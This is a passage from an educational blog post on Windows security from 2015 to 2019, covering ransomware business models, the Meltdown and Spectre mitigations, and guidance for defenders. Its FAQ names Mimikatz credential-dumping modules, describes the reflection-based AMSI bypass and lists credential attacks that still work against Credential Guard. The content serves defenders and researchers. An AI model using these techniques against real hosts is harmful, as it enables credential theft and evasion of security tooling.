&lt;p&gt;Bad Rabbit was a four-month-later, smaller-scale cousin. Distribution was via drive-by infection from compromised Russian and Ukrainian media sites, with a payload masquerading as an Adobe Flash Player installer. Lateral movement used EternalRomance, not EternalBlue, and Kaspersky&apos;s analysis confirms code overlap with NotPetya [@kaspersky-bad-rabbit]. The blast radius was Slavic-language-region targeted. One paragraph of treatment matches the historical importance: enough to triangulate Sandworm, not enough to change the architectural story.&lt;/p&gt;
&lt;h3&gt;9.4 The Big Game Hunting Transition (2018-2019)&lt;/h3&gt;
&lt;p&gt;By the second half of 2018, ransomware crews had decided that mass spray was leaving money on the table. The pattern crystallized into what CrowdStrike named, in late 2018 and early 2019, &lt;em&gt;big game hunting&lt;/em&gt; [@crowdstrike-ryuk].&lt;/p&gt;

A targeted ransomware business model in which a human operator gains access to a victim network, performs hands-on-keyboard reconnaissance, escalates to Domain Admin, locates backup infrastructure, and deploys ransomware enterprise-wide in a single coordinated event. Ransom demands scale to victim revenue. CrowdStrike&apos;s January 2019 write-up of WIZARD SPIDER&apos;s Ryuk operations is the standard reference for the term [@crowdstrike-ryuk].
&lt;p&gt;The proto-Big-Game-Hunting predecessor is SamSam, operated from December 2015 through November 2018 by the Iranian operators Faramarz Shahi Savandi and Mohammad Mehdi Shah Mansouri. SamSam combined Internet-facing RDP brute force and JBoss exploitation with manual lateral movement and ransomware-of-the-domain-controller, caused more than $30 million in aggregate damages, and collected more than $6 million in ransom payments, per the November 28, 2018 DOJ indictment of Savandi and Mansouri [@doj-samsam]. The thirty-million figure is the DOJ&apos;s &lt;em&gt;damages / losses&lt;/em&gt; characterization, not the &lt;em&gt;demanded ransom&lt;/em&gt; amount: per-victim SamSam demands ran in the five- to fifty-thousand-dollar range, and the aggregate damages include downtime, recovery, and unrecovered ransom rather than the operators&apos; headline ask. SamSam was the phase from 2016 forward; CrowdStrike named the phase in 2018.&lt;/p&gt;
&lt;p&gt;The named-and-canonical Big Game Hunting lineage runs through three families.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Ryuk&lt;/strong&gt; first appeared in August 2018, operated by CrowdStrike&apos;s WIZARD SPIDER (the TrickBot crew). Check Point&apos;s first-wave analysis identified the code overlap with the earlier HERMES ransomware, originally attributed to the Lazarus Group, though Check Point notes the toolchain overlap rather than asserting shared operations [@checkpoint-ryuk]. The killchain Cybereason later detailed was the Emotet -&amp;gt; TrickBot -&amp;gt; Ryuk trifecta: a phishing-delivered Emotet loader, TrickBot for credential theft and lateral movement, hands-on-keyboard reconnaissance, and Ryuk for the encryption payload.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;REvil&lt;/strong&gt; -- also called Sodinokibi -- emerged in April 2019. The Talos analysis published April 30, 2019 attributed first observed in-the-wild exploitation of CVE-2019-2725 to a Sodinokibi-deploying campaign active since at least April 17, 2019 [@talos-sodinokibi]; April 30 is the &lt;em&gt;publication&lt;/em&gt; date of the Talos write-up, not the first-observed exploitation date. Secureworks attributed the operation to the GOLD SOUTHFIELD group and noted Sodinokibi was &quot;likely associated with the GandCrab ransomware due to similar code and the emergence of REvil as GandCrab activity declined&quot; [@secureworks-revil].&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Maze&lt;/strong&gt; entered the field in May 2019 [@malwarebytes-maze-2020].&lt;/p&gt;

flowchart LR
    A[Spear-phish&lt;br /&gt;Emotet loader]
    B[TrickBot&lt;br /&gt;credential theft]
    C[Hands-on-keyboard&lt;br /&gt;lateral movement]
    D[Domain Admin]
    E[Backup-network&lt;br /&gt;reconnaissance]
    F[Mass deployment&lt;br /&gt;SCCM, GPO, PsExec]
    G[Exfiltration]
    H[Encryption]
    I[Leak-site pressure]
    A --&amp;gt; B --&amp;gt; C --&amp;gt; D --&amp;gt; E --&amp;gt; F --&amp;gt; H
    E --&amp;gt; G --&amp;gt; I
    H --&amp;gt; I
&lt;h3&gt;9.5 Maze and Double Extortion (November 21, 2019)&lt;/h3&gt;
&lt;p&gt;The fifth-generation business model arrived in late 2019. Maze&apos;s operators attacked the security-staffing firm Allied Universal in November 2019. When Allied Universal refused to pay, Maze threatened to release the stolen files publicly. In December 2019, Maze published a leak site listing victims who had not paid, with sample data to prove possession. Brian Krebs broke the story on December 16, 2019: &quot;Less than 48 hours ago, the cybercriminals behind the Maze Ransomware strain erected a Web site on the public Internet... that changed at the end of last month, when the crooks behind Maze Ransomware threatened Allied Universal that if they did not pay the ransom, they would release their files&quot; [@krebs-maze].&lt;/p&gt;

A ransomware business model in which the operator exfiltrates victim data before encrypting it, then threatens public disclosure of the data as a separate pressure axis if the ransom is not paid. Maze, beginning with the November 2019 Allied Universal case and the December 2019 dedicated leak site, is the canonical first systematic deployment [@krebs-maze]. Snatch had threatened similar disclosure earlier in October 2019, but did not operate dedicated leak-site infrastructure [@sophos-snatch].
&lt;p&gt;The economic logic is simple. The ransomware-only business model assumed the victim&apos;s only pressure point was the encrypted data -- which meant good backups defeated the extortion. Double extortion adds a second pressure axis (public disclosure) that backups do not address. The pattern propagated industry-wide in 2020; &lt;strong&gt;exfil-then-encrypt is now the standard ransomware business model.&lt;/strong&gt;&lt;/p&gt;
&lt;h3&gt;9.6 The synthesis: a paradox of layers&lt;/h3&gt;
&lt;p&gt;Now the synthesis. The Enterprise laptop with Credential Guard enabled, in Scene A of Section 1, sat above the VBS architecture. The unpatched SMBv1 Windows 7 box on the NHS network, in Scene B, sat below it -- on a vintage of Windows that predated Credential Guard entirely and on a network nobody had segmented around the wormable SMBv1 protocol. Both ran &quot;Windows&quot; in the same five-year window. The difference between them was not architectural rigor. The difference was operational rigor: patches applied, segmentation configured, SMBv1 disabled, supported SKUs deployed, VBS enabled.&lt;/p&gt;
&lt;p&gt;VBS is a &lt;em&gt;structural defense&lt;/em&gt; for the credential store on a properly-configured Enterprise endpoint. Patching is an &lt;em&gt;operational defense&lt;/em&gt; for the network-edge attack surface. They protect orthogonal layers of the stack. A correct defense at one layer is consistent with a catastrophic miss at the other.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Key idea:&lt;/strong&gt; The paradox of simultaneity: Microsoft&apos;s largest structural defensive break in twenty years and the criminal and state-actor world&apos;s largest operational expansion in twenty years happened in the same five-year window because they live at different layers of the defense stack.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;There is one more axis, and it is orthogonal to both VBS and patch velocity. The CPU itself was the attacker&apos;s primitive.&lt;/p&gt;
&lt;h2&gt;10. The Third Axis: Meltdown, Spectre, KVA Shadow, Retpoline (2018-2019)&lt;/h2&gt;
&lt;p&gt;On January 3, 2018, the security industry&apos;s calendar acquired a new entry. Jann Horn at Google Project Zero, Moritz Lipp and colleagues at Graz University of Technology, Paul Kocher independent, and a coordination of six other institutions disclosed that out-of-order execution on every Intel CPU shipped since the mid-1990s could be turned against the kernel-user privilege boundary [@pz-meltdown-spectre]. None of the Windows defenses shipped in the prior thirty months touched the attack class. None could. The attacker&apos;s primitive was the CPU.&lt;/p&gt;
&lt;p&gt;The Google Project Zero blog post enumerates three variants. &lt;strong&gt;Variant 1&lt;/strong&gt;, bounds check bypass, became CVE-2017-5753. &lt;strong&gt;Variant 2&lt;/strong&gt;, branch target injection, became CVE-2017-5715. &lt;strong&gt;Variant 3&lt;/strong&gt;, rogue data cache load, became CVE-2017-5754 and was named Meltdown [@pz-meltdown-spectre] [@ms-myerson-meltdown]. Variants 1 and 2 together became the family named Spectre. The peer-reviewed papers landed later: Meltdown at USENIX Security 2018 with Lipp as lead author and an authorship list including Schwarz, Gruss, Prescher, Haas, Fogh, Horn, Mangard, Kocher, Genkin, Yarom, and Hamburg [@lipp-meltdown-usenix]; Spectre at IEEE S&amp;amp;P 2019 with Kocher as lead author [@kocher-spectre-ieee].The Meltdown paper&apos;s authorship list does not include &quot;Strackx&quot; -- that name belongs to the later Foreshadow / L1TF paper. The audit on this article&apos;s research stage flagged the attribution error; the corrected roster is the one cited above [@lipp-meltdown-usenix].&lt;/p&gt;
&lt;p&gt;Windows shipped three mitigations in response. &lt;strong&gt;KVA Shadow&lt;/strong&gt; is Microsoft&apos;s name for what Linux calls Kernel Page-Table Isolation -- the technique descended from Gruss et al.&apos;s 2017 KAISER paper. The mechanism is to maintain two page tables per process. The &quot;user&quot; page table maps only the user address space and a minimal kernel trampoline. The &quot;kernel&quot; page table maps the full kernel. Every user-mode-to-kernel-mode transition swaps the CR3 register to install the kernel page table; every return swaps it back. The kernel page-table entries that previously sat in the same virtual address space as the user, and that Meltdown exploited speculatively, are no longer mapped during user-mode execution.&lt;/p&gt;

sequenceDiagram
    participant U as User-mode process
    participant CPU as CPU
    participant K as Kernel
    U-&amp;gt;&amp;gt;CPU: syscall instruction
    CPU-&amp;gt;&amp;gt;CPU: swap CR3 to kernel page-table
    CPU-&amp;gt;&amp;gt;K: dispatch kernel handler
    K-&amp;gt;&amp;gt;K: execute handler logic
    K-&amp;gt;&amp;gt;CPU: prepare return
    CPU-&amp;gt;&amp;gt;CPU: swap CR3 to user shadow page-table
    CPU--&amp;gt;&amp;gt;U: return to user mode
&lt;p&gt;&lt;strong&gt;Retpoline&lt;/strong&gt; is the Spectre v2 mitigation. The technique, due to Paul Turner at Google in early 2018, replaces every indirect branch with a return-based thunk that the speculative-execution unit cannot mis-train into the attacker&apos;s chosen target. Microsoft backported Retpoline into Windows 10 1809 via the KB4482887 cumulative update on March 1, 2019, and enabled it by default via cloud configuration on May 14, 2019; the canonical write-up sits on the Windows Kernel team&apos;s TechCommunity blog (first posted December 6, 2018; updated through May 14, 2019) [@ms-retpoline]. The timing matters because Windows 10 1809 reached RTM on November 13, 2018: on supposedly-Retpoline-protected 1809 boxes there were roughly six months of unprotected Spectre v2 surface between the 1809 RTM and the May 14, 2019 cloud-enable.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;IBRS, IBPB, and STIBP&lt;/strong&gt; -- Indirect Branch Restricted Speculation, Indirect Branch Predictor Barrier, Single Thread Indirect Branch Predictor -- are the CPU-MSR-controlled mitigations delivered through Intel and AMD microcode updates that Windows manages via the kernel.&lt;/p&gt;
&lt;p&gt;The performance cost was not uniform. Terry Myerson&apos;s January 9, 2018 Microsoft Security Blog post tiers it: Skylake-and-newer client CPUs saw &quot;single-digit slowdowns&quot;; Haswell-era and older systems saw &quot;more significant slowdowns&quot;; Server 2016 and SQL workloads saw &quot;even more significant slowdowns&quot; [@ms-myerson-meltdown]. The MariaDB community published one of the most-cited empirical anchors: on Haswell-era hardware doing MyISAM table scans, KPTI cost 37 to 40 percent in the worst case [@mariadb-kpti]. A 40 percent regression for a SQL workload is an unmistakable signal that the page-table swap dominates short-syscall-heavy code paths.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; Operators who use the &lt;code&gt;FeatureSettingsOverride&lt;/code&gt; and &lt;code&gt;FeatureSettingsOverrideMask&lt;/code&gt; registry knobs to disable KVA Shadow, Retpoline, or IBRS in pursuit of benchmark numbers are running an operationally unpatched Meltdown-vulnerable system. The performance numbers in benchmark blogs that &quot;disable mitigations&quot; are reporting the speed of a hardware configuration whose threat model is January 2018.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;The lesson here is structural. &lt;em&gt;VBS does not help against microarchitectural attacks because VBS protects against software primitives; the CPU itself is the attacker&apos;s primitive.&lt;/em&gt; The only point at which the microarchitectural axis touches VBS is Spectre v2 cross-VTL leakage during secure-call dispatch, and the answer there is to set IBRS on secure-call entry -- the same MSR-level control that protects any indirect branch in privileged code.&lt;/p&gt;
&lt;p&gt;VBS, patch velocity, microarchitectural mitigations. Three axes of defense, each addressing a different attack primitive. Where does that leave the operator on December 31, 2019?&lt;/p&gt;
&lt;h2&gt;11. Operating Windows 10 in the 2017-2019 Threat Environment&lt;/h2&gt;
&lt;p&gt;A defender at the 2019 cutline who reads only the architecture papers will deploy VBS and feel safe. A defender who reads only the breach reports will assume nothing works. The truth is structurally bounded.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;For enterprise administrators.&lt;/strong&gt; Enable Credential Guard plus HVCI on Enterprise SKUs from 1607 forward [@ms-credential-guard] [@ms-hvci]. Deploy WDAC with audit-mode-first rollout, then enforce [@ms-wdac]. Patch within 30 days of MSRC release -- the WannaCry lesson is fifty-nine days. Disable SMBv1 outright. Inventory unused signed kernel drivers and remove them. Stand up Defender for Endpoint or an equivalent EDR. Treat segmentation between user subnets and server subnets as a deployable security control, not an architectural aspiration.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; Production WDAC policies routinely run to thousands of rules. The canonical mitigation for XML-authoring complexity is reference-monitor-mode rollouts: ship the policy in audit mode, collect 7 to 14 days of &lt;code&gt;MicrosoftWindows-CodeIntegrity/Operational&lt;/code&gt; events from real users, refine the allow-list against the captured baseline, then move to enforce. Skipping audit mode reliably produces a Tuesday morning of broken business workflows [@ms-wdac].&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;&lt;strong&gt;For application developers.&lt;/strong&gt; Compile with &lt;code&gt;/guard:cf&lt;/code&gt; to opt into CFG instrumentation [@ms-cfg]. Set per-app Process Mitigation Policies via &lt;code&gt;Set-ProcessMitigation&lt;/code&gt; [@ms-set-processmitigation], picking the subset (ACG, CIG, Strict Handle Checks, Disable Win32k System Calls) that fits your runtime. Sign your binaries with Authenticode using a hardware-backed key. If your application reads credentials, make sure they never touch LSASS; use the CredUI or Web Account Manager surface, which integrates with Credential Guard cleanly.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;For security researchers.&lt;/strong&gt; Read Ionescu&apos;s Black Hat USA 2015 deck plus the Weston-Ionescu OPCDE 2018 &quot;Inside the Octagon&quot; before claiming a &quot;VBS bypass&quot; [@ionescu-bh2015] [@opcde-inside-octagon]. Categorize any bypass you find into one of the six classes named in Section 8 -- BYOVD, hypervisor or secure-call bugs, hardware DMA, microarchitectural side channels, trustlet-signing-root compromise, or VTL0-agent surface. Cross-cite Microsoft Learn for any specification-level claim about VTL semantics. The Yosifovich, Ionescu, Russinovich, and Solomon &lt;em&gt;Windows Internals&lt;/em&gt; 7th edition, Part 1 (May 2017) remains the canonical textbook anchor for the 1507-to-1607 era architecture [@mspress-windows-internals-7e].&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;For SOC analysts.&lt;/strong&gt; EternalBlue and DoublePulsar signatures are still recurring in unmanaged-edge devices in 2024 and 2025 [@hunterstrategy-eternalblue]. Train detection rules on the SMB signal, not just the WannaCry payload signature.The DoublePulsar implant responds to a specific SMB Trans2 SESSION_SETUP subcommand with a non-zero Multiplex ID, which is the most-cited single-packet network signature for triage. The Emotet -&amp;gt; TrickBot -&amp;gt; Ryuk killchain pattern is the operational anchor for human-operated ransomware detection; the IOCs change every quarter, but the kill-chain stages do not. PrintNightmare, a 2021 Part-5 story, reuses the same SMB-style propagation pattern.&lt;/p&gt;

On a Windows 10 or 11 Enterprise host, run `msinfo32.exe`, find the &quot;Virtualization-based security Services Running&quot; row, and confirm it lists `Credential Guard`. From PowerShell, `Get-CimInstance -ClassName Win32_DeviceGuard -Namespace root\Microsoft\Windows\DeviceGuard | Select SecurityServicesRunning` returns an array whose value `1` corresponds to Credential Guard and value `2` to HVCI. If the array is empty, VBS is configured but no isolated services have started, and the LSAISO trustlet is not actually protecting credentials on that machine.
&lt;p&gt;By the end of 2019, the architectural floor is named. The operational floor is named. Three axes are not yet closed.&lt;/p&gt;
&lt;h2&gt;12. What 2015-2019 Did Not Solve&lt;/h2&gt;
&lt;p&gt;Five problems leave this window open. Each is a chapter of Part 5 or Part 6, and each is open because the architectural gap and the deployment gap are at different sizes.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Supply-chain integrity.&lt;/strong&gt; NotPetya proved that build-pipeline compromise is the dominant remaining attack class against well-defended estates [@talos-medoc] [@eset-telebots]. Microsoft&apos;s Security Development Lifecycle codifies pre-release secure-engineering practice [@ms-sdl], but SDL stops at the binary the build pipeline emits; it does not certify that the binary any verifier can rebuild matches that binary.&lt;/p&gt;
&lt;p&gt;The 2015-2019 window saw two structural answers begin to mature. Debian&apos;s reproducible-builds project, in continuous progress since 2013, reached approximately 94 percent reproducibility by mid-2017 [@lwn-debian-reproducible]; the Tor Project&apos;s deterministic-builds work in 2014 framed the watering-hole-attack defense the discipline existed to address [@tor-deterministic-builds]. The Linux Foundation&apos;s Sigstore project, announced March 9, 2021, finally shipped a free transparency-log signing infrastructure for software artifacts [@lf-sigstore], and the NIST SP 800-218 Secure Software Development Framework codified the practice into a federal expectation in February 2022 [@nist-ssdf]. SolarWinds in December 2020 -- the Part 5 chapter -- forced the industry to take this open problem seriously.&lt;/p&gt;
&lt;p&gt;The architectural distinction is between code-signing-as-supply-chain-integrity (signs whatever the build pipeline emits, regardless of pipeline compromise) and reproducible-build-as-supply-chain-integrity (signs only binaries any verifier can independently reproduce from source). At the 2019 cutline, reproducible builds are not the deployment norm; by the mid-2020s they are still not the norm for proprietary Windows-side software.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;The hypervisor and secure-call interface.&lt;/strong&gt; Amar and King&apos;s 2020 work on &lt;code&gt;SkmmUnmapMdl&lt;/code&gt; and &lt;code&gt;SkmiReleaseUnknownPTEs&lt;/code&gt; disclosed two kernel-strong VTL1 bugs reachable from VTL0 -- CVE-2020-0917 and CVE-2020-0918 -- and set the public-disclosure baseline at roughly one to three secure-call interface bugs per year [@amar-king-bh2020] [@msrc-cve-2020-0917].&lt;/p&gt;
&lt;p&gt;Microsoft&apos;s response posture is enforcement, not formal verification. The Hyper-V Bounty program pays up to $250,000 for a guest-to-host escape, with corresponding lower tiers for partial escapes and architectural vulnerabilities [@ms-hyperv-bounty]. The Microsoft Security Servicing Criteria treats secure-kernel and HVCI bypasses as Servicing Tier 1, meaning they are silently serviced through the normal patch cadence rather than coordinated as headline incidents [@ms-servicing-criteria]. The Saar-Amar-style Hyperseed fuzzer remains the internal-tooling baseline.&lt;/p&gt;
&lt;p&gt;The open question is whether a formally-verified secure-call interface is achievable for Microsoft&apos;s deployed codebase. seL4 establishes that verification is feasible at roughly nine thousand lines of C [@klein-sel4-sosp2009]; &lt;code&gt;securekernel.exe&lt;/code&gt; is approximately 150 kilobytes with substantial integration surface. The 2019 answer is &quot;not yet.&quot; The cadence of CVEs since suggests the answer through 2024 remains &quot;not yet.&quot;&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;The BYOVD pipeline.&lt;/strong&gt; Microsoft&apos;s October 2022 default-on Vulnerable Driver Blocklist (KB5020779) blocks known-bad signed drivers reactively, by hash [@ms-vuln-driver-kb] [@ms-vuln-driver-blockrules]. The blocklist is fed by Microsoft&apos;s IHV-partnership submission flow, and Windows Defender Application Control consumes the same policy at the system level. The LOLDrivers community catalog tracks several hundred vulnerable signed drivers as of 2024 [@loldrivers], far more than the curated subset KB5020779 covers.&lt;/p&gt;
&lt;p&gt;The structural distinction is between known-bad drivers blocked by hash -- the current approach -- and retroactive driver-signing revocation, which would block by certificate. Hash-based blocking handles the dominant in-the-wild surface; certificate-based revocation breaks legitimate deployments that rely on older signed drivers with Authenticode timestamps that pre-date the revocation. Microsoft has not solved that tradeoff at the 2019 cutline. KB5020779 (October 2022) is the partial answer. Full retroactive revocation remains open.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Microarchitectural side channels in cross-VTL boundaries.&lt;/strong&gt; Spectre v2 leakage across the VTL0 to VTL1 boundary invalidates Credential Guard&apos;s confidentiality invariant if VTL0 can poison the indirect branch predictor that VTL1 consumes during a secure-call handler return; IBRS on secure-call entry is the standing mitigation, but every new microarchitectural class re-prices the defense.&lt;/p&gt;
&lt;p&gt;LVI (Load Value Injection, CVE-2020-0551, March 2020), RIDL and ZombieLoad (May 2019, microarchitectural data sampling), and Inception (USENIX Security 2023, AMD-SB-7005 against Zen 3 and Zen 4 [@usenix-inception] [@amd-sb-7005]) each open a new variant. The structural answer the industry is moving toward is microarchitecturally-partitioned CPUs: Intel TDX [@intel-tdx] and AMD SEV-SNP [@amd-sev-snp] both ship hardware-isolated virtual machines with per-VM memory encryption that close the cross-VTL leakage class by construction. Both are datacenter-only at the 2019 cutline; neither lands on mainstream Windows endpoints until well after the article&apos;s window. The 2019 operational state is IBRS-plus-microcode mitigation, re-priced each time a new variant lands.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Big Game Hunting defense when backups stop being a deterrent.&lt;/strong&gt; Maze&apos;s double-extortion playbook neutralized the backup-equipped defender&apos;s bargaining position [@krebs-maze]. Three research directions are open.&lt;/p&gt;
&lt;p&gt;Cryptographic data-at-rest segmentation -- file-level encryption keyed to per-team hardware security modules, so a single compromised account cannot exfiltrate the full data corpus -- is the most direct technical answer. Segmented backup storage, in which the backup network is operationally isolated from the production network and authenticates only out-of-band, is the operational pattern that the segmented-tier-zero Active Directory work in this window points toward. Zero-knowledge backup storage, in which the storage provider holds only customer-encrypted blobs and cannot itself be compelled into the leak chain, is the architectural backstop.&lt;/p&gt;
&lt;p&gt;Cyber-insurance market design is the fourth axis: after the Mondelez-versus-Zurich act-of-war dispute, the insurance industry restructured but did not solve the moral-hazard problem of ransom-coverage as a payment channel. Maze itself ceased operations in October 2020. The playbook persisted under Conti, LockBit, and successor groups through 2024.&lt;/p&gt;
&lt;p&gt;Part 5 picks up at December 2020 with SolarWinds. Part 6 closes with the &lt;a href=&quot;https://paragmali.com/blog/the-day-85-million-devices-couldnt-boot----and-how-microsoft/&quot; rel=&quot;noopener&quot;&gt;CrowdStrike Falcon outage&lt;/a&gt; and the post-Pluton trust topology. The next five years will not be quieter.&lt;/p&gt;
&lt;h2&gt;13. Frequently Asked Questions&lt;/h2&gt;

Mimikatz still works, but the attack family Credential Guard was engineered against returns empty. The LSASS-scrape modules -- `sekurlsa::logonpasswords`, `sekurlsa::tickets`, `lsadump::secrets` -- read the bytes Credential Guard relocates into LSAISO in VTL1 [@ms-credential-guard], so the data is no longer where Mimikatz scans. What still works against a CG-enabled host is anything outside that threat model: pass-the-ticket replay of a TGT captured before CG was enabled, sign-in-time keylogging, stolen-DC krbtgt forgery, or BYOVD-grade kernel primitives that take advantage of secure-kernel bugs.

Yes. Six classes, all enumerated in Section 8 -- BYOVD with a vulnerable signed driver, hypervisor or secure-kernel vulnerabilities such as the 2020 Amar-King work on `SkmmUnmapMdl` [@amar-king-bh2020], pre-IOMMU hardware DMA, microarchitectural side channels, trustlet-signing-root compromise, and bugs in the VTL0 agents that broker requests to VTL1. None of those undermines the architectural claim that classical kernel-mode code injection is closed by HVCI&apos;s enforcement of write-XOR-execute on VTL0 kernel pages [@ms-hvci]. The bypass classes shape deployment posture; they do not invalidate the model.

Yes, in PowerShell user space. The Matt Graeber reflection trick that sets `AmsiUtils.amsiInitFailed` to true short-circuits AMSI within the running PowerShell process. MDSec&apos;s June 2018 write-up walks the family [@mdsec-amsi-bypass]. AMSI is a hook, not a sandbox; the bypass surface is part of the design tradeoff. The defender&apos;s response is the Defender behavioral pipeline and cloud telemetry, plus Constrained Language Mode and PowerShell logging that capture the bypass attempt itself as a high-confidence signal.

Both are 2016+ Server features that build on the VBS substrate, but they were not the primary endpoint-security story in 2015-2019. The vTPM trustlet (Trustlet ID 2 in Ionescu&apos;s enumeration [@ionescu-bh2015]) supports Hyper-V Shielded VMs in the Server 2016 timeframe; that is a datacenter, not an endpoint, story. The Part 4 endpoint thesis is Credential Guard, HVCI, WDAC, AMSI, CFG, and Process Mitigation Policies.

No. WannaCry used EternalBlue, an NSA-developed exploit that the Shadow Brokers leaked in their April 14, 2017 &quot;Lost in Translation&quot; dump [@wiki-eternalblue]. The operators of WannaCry were the Lazarus Group, attributed to North Korea by the United States, the United Kingdom, Australia, Canada, New Zealand, and Japan in a coordinated December 19, 2017 statement [@wh-wannacry]. The architectural lesson -- that a leaked nation-state SMB worm hit unpatched estates fifty-nine days after Microsoft shipped MS17-010 [@ms-ms17-010] -- is independent of who fired the weapon.

No. Kaspersky and CrowdStrike independently confirmed that the Salsa20 key derivation in NotPetya made decryption impossible by design [@kaspersky-petya]. The ransom payment screen was a decoy; the malware was a wiper. US, UK, Canadian, and Australian governments attributed the operation to Russian military intelligence (GRU Sandworm / Unit 74455) on February 15, 2018 [@wh-notpetya] [@ncsc-russia-notpetya]. The October 19, 2020 US Department of Justice indictment named six GRU officers [@doj-gru-notpetya].

Control Flow Guard is forward-edge, software-only, compiler-instrumented Control-Flow Integrity per the Burow et al. ACM CSUR 2017 taxonomy [@burow-cfi-csur2017] [@ms-cfg]. It validates the targets of indirect calls and jumps against a compile-time-known bitmap. Intel Control-flow Enforcement Technology adds a hardware-enforced shadow stack -- a backward-edge defense that protects return addresses. CET on Windows is a Part 5 story; here it suffices to say that CFG and CET defend orthogonal edges of the control-flow graph.
&lt;h2&gt;14. Three Boxes, Three Outcomes&lt;/h2&gt;
&lt;p&gt;A 2017 red-team operator can dump LSASS on an unprotected Windows 7 box in less than a minute. The same operator, against a 1607 Enterprise laptop with Credential Guard enabled, sees an empty buffer where the NTLM hash should be. A 2017 NHS workstation, fifty-nine days behind on MS17-010, sees a ransom note. Three Windows boxes. Three outcomes. One five-year window.&lt;/p&gt;
&lt;p&gt;The structural defense -- VBS, the Secure Kernel, LSAISO -- did exactly what its designers said it would do, in a way that was independently verifiable from the empty Mimikatz output buffer. The operational defense -- patch within a month, segment SMBv1, disable legacy protocols -- did exactly what its proponents said it would do, on the boxes where it was applied. The paradox of simultaneity is just the shape of the same picture seen from both sides.&lt;/p&gt;
&lt;p&gt;Part 5 takes the story forward into supply-chain compromise, hardware-rooted attestation, and the Intel CET shadow stack. The next five years did not solve the six bypass classes named here. They named more of them.&lt;/p&gt;
&lt;p&gt;&amp;lt;StudyGuide slug=&quot;above-the-kernel-windows-security-wars-part-4&quot; keyTerms={[
  { term: &quot;Virtualization-Based Security (VBS)&quot;, definition: &quot;Windows security architecture that uses hardware virtualization extensions and Second-Level Address Translation to run the NT kernel and a Secure Kernel as separate Virtual Trust Levels on the same machine.&quot; },
  { term: &quot;Virtual Trust Level (VTL)&quot;, definition: &quot;Hyper-V hypervisor abstraction in which higher-numbered VTLs are strictly more privileged than lower-numbered ones. Shipped Windows uses VTL0 for the NT kernel and VTL1 for the Secure Kernel.&quot; },
  { term: &quot;Trustlet&quot;, definition: &quot;A Microsoft-signed process that runs in VTL1 Isolated User Mode and is protected from VTL0 inspection. Trustlets are gated at creation by five mechanical checks including two specific Enhanced Key Usage OIDs.&quot; },
  { term: &quot;LSAISO&quot;, definition: &quot;Trustlet ID 1; the Credential Guard secret-keeper. Holds NTLM hashes, Kerberos TGTs, and other credential material in VTL1 while LSA in VTL0 retains the API surface.&quot; },
  { term: &quot;HVCI&quot;, definition: &quot;Hypervisor-Protected Code Integrity. Uses the Hyper-V hypervisor to enforce write-XOR-execute on VTL0 kernel pages via Extended Page Tables, closing the classical kernel code-injection attack class.&quot; },
  { term: &quot;Same-privilege paradox&quot;, definition: &quot;The structural observation that any defense at the same CPU privilege level as the attacker can be disabled by the attacker. The only structural escape is to relocate the defender.&quot; },
  { term: &quot;BYOVD&quot;, definition: &quot;Bring Your Own Vulnerable Driver. An attack class in which the adversary loads a legitimately Microsoft-co-signed third-party driver with an exploitable bug to obtain kernel-mode primitives.&quot; },
  { term: &quot;Big Game Hunting&quot;, definition: &quot;Targeted ransomware business model in which a human operator performs hands-on-keyboard reconnaissance and deploys ransomware enterprise-wide at high ransom demand. Named by CrowdStrike in 2018.&quot; },
  { term: &quot;Double extortion&quot;, definition: &quot;Ransomware business model that exfiltrates victim data before encrypting, then threatens public disclosure as a second pressure axis. Maze&apos;s November 2019 Allied Universal case is the canonical first systematic deployment.&quot; },
  { term: &quot;KVA Shadow&quot;, definition: &quot;Microsoft&apos;s Meltdown mitigation. Maintains two page tables per process and swaps CR3 at every user/kernel transition, so the kernel page-table entries that Meltdown exploited speculatively are not mapped during user-mode execution.&quot; }
]} /&amp;gt;&lt;/p&gt;
</content:encoded><category>windows-security</category><category>virtualization-based-security</category><category>credential-guard</category><category>hvci</category><category>ransomware</category><category>wannacry</category><category>notpetya</category><category>meltdown-spectre</category><category>The Windows Security Wars</category><author>noreply@paragmali.com (Parag Mali)</author></item><item><title>Every UAC Prompt Is an ALPC Handshake: A Field Guide to Windows&apos; Most-Attacked Local IPC Fabric</title><link>https://paragmali.com/blog/every-uac-prompt-is-an-alpc-handshake-a-field-guide-to-windo/</link><guid isPermaLink="true">https://paragmali.com/blog/every-uac-prompt-is-an-alpc-handshake-a-field-guide-to-windo/</guid><description>ALPC and LRPC are the asynchronous local-IPC fabric under every Windows service. This is the story of the kernel object Microsoft does not document and the attack surface almost every Patch Tuesday still fixes.</description><pubDate>Wed, 27 May 2026 00:00:00 GMT</pubDate><content:encoded>
Every Windows service that exposes a local API does so through **LRPC**, the RPC runtime&apos;s local-only transport, and LRPC rides on top of **ALPC**, the kernel&apos;s asynchronous message-and-attribute IPC primitive. The kernel layer is settled engineering. The interface-callback layer in user-mode RPC application code is the load-bearing local elevation-of-privilege surface that almost every Patch Tuesday since 2018 has shipped fixes for. Microsoft does not publish a Win32 or WDK reference for the kernel-side ALPC API; the public knowledge of both layers comes from a handful of named researchers reverse-engineering it. And per-connection ALPC ports are unnamed, which is the asymmetry that makes the threat model coherent -- Section 4 walks why.
&lt;h2&gt;1. Every UAC Prompt Is an ALPC Handshake&lt;/h2&gt;
